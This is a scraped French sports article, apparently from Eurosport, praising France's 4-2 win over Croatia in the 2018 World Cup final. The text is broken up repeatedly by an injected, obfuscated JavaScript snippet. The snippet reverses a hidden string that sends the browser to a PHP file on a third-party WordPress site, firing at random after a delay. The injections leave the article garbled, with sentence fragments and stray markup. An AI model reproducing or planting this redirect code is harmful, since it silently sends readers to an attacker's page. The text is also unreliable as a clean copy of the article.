Coupe du Monde 2018: France – Croatie (4-2) : L’efficacité, plus sûr chemin vers l’éternité

andonnées lors de l’entame du match. La Croatie a fini par plier.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph”>$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/blaise-matuidi_prs48297/person.shtml”>Matuidi, DD a fait toujours confiance aux mêmes. Si son onze avait répondu présent, dominé dans l’impact et fait preuve d’une solidité à toute épreuve lors des tours précédents, les Bleus ont peiné au pire moment.

Face à la Croatie, les Tricolores ont souffert le martyr, techniquement et physiquement lors d’une première période quasiment miraculeuse et terminée avec un avantage au score. À la reprise, les Bleus ont eu un mérite. Hausser (un peu) leur niveau de jeu et s’appuyer sur leurs forces qui n’allaient pas tarder à mettre en exergue les soucis croates à venir. $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph”>On ne sait pas s’il aura droit à son petit Ballon d’Or en décembre. Mais toine-griezmann_prs219784/person.shtml”>Antoine Griezmann s’en fout. Il a déjà une Coupe du monde sur sa cheminée. Et il a grandement contribué au triomphe bleu. Buteur et passeur, le joueur de l’Atlético fut le meilleur joueur de cette finale, un peu devant Kylian Mbappé qui a pris le relais en seconde période pour faire exploser la Croatie.

and les choses n’allaient pas bien, $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/hugo-lloris_prs47908/person.shtml”>Hugo Lloris, qui s’est troué et a laissé espérer les Croates.

Le facteur X : L’irrationnel

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolink” href=”https://www.eurosport.fr/football/mario-mandzukic_prs207651/person.shtml”>Mandzukic à cette boulette XXL en passant par la VAR, la finale 2018 de la Coupe du monde aura été l’une des plus illisibles. Mais quelle saveur.

La stat : 4

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__paragraph-hyperlink”>Poser la question, c’est déjà y répondre un peu. On ne sait pas trop. Mais, au fond, on s’en contrefiche. to6849877/story.shtml”>L’équipe de France a conquis à Moscou la deuxième Coupe du monde de son histoire et cela suffit à son bonheur et à celui d’un peuple qui, à l’heure où ces lignes sont publiées, est déjà dans la rue et s’apprête à vivre un doux été qui ne sera pas sans rappeler les agapes de 1998 où la nation s’était éprise de passion pour son équipe.

tout ce qui faisait leur force depuis le Pérou, les Français se sont retrouvés privés de leurs pouvoirs magiques durant quarante-cinq bonnes minutes. Sauf un : son efficacité d’exception, au sens propre du terme.

and 1998 avait sacré la solidité. A l’arrivée, un même bonheur. Une même place au Panthéon des éternels.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toryfull__content-picture storyfull__content-picture–picture”>

Kylian Mbappé
  • 8
  •  
  •  
  •  
  •  
    8
    Partages
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :